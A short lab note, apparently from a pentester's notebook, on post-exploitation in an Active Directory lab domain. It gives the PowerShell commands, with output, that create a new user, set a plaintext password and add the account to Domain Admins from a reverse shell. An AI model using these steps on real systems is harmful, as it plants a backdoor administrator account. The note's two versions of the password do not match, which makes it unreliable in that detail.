init#

When we have reverse shell from that shell we need to create a user so that we can access the domain as domain admin. However, sometimes you might have only hash of that user but unable to login locally.

In such situation, it could be beneficial to create a AD Domain user and work on it

To create the user

PS C:\users\robb.stark\Desktop> New-ADUser adm1n
New-ADUser adm1n

To check if the user has been successfully created.

PS C:\users\robb.stark\Desktop> Get-Aduser adm1n
Get-Aduser adm1n


DistinguishedName : CN=adm1n,CN=Users,DC=north,DC=sevenkingdoms,DC=local
Enabled           : False
GivenName         : 
Name              : adm1n
ObjectClass       : user
ObjectGUID        : 5b0ef0d9-d90b-40a7-bf41-b61e035f1fa0
SamAccountName    : adm1n
SID               : S-1-5-21-3140856773-605703633-3835146884-1123
Surname           : 
UserPrincipalName :

To set the password

Set-ADAccountPassword -Identity adm1n -NewPassword (ConvertTo-SecureString -AsPlainText "qwert@12345" -Force)

To add the user to the Domain Admin Group

Add-ADGroupMember -Identity 'Domain Admins' -Members adm1n

(Get-ADUser adm1n -Properties MemberOf).MemberOf

==>
PS C:\users\robb.stark\Desktop> (Get-ADUser adm1n -Properties MemberOf).MemberOf
(Get-ADUser adm1n -Properties MemberOf).MemberOf
CN=Domain Admins,CN=Users,DC=north,DC=sevenkingdoms,DC=local

Now we have created a user adm1n who has the password of qwert@1234

Windows privilege escalation

Table of Contents

init#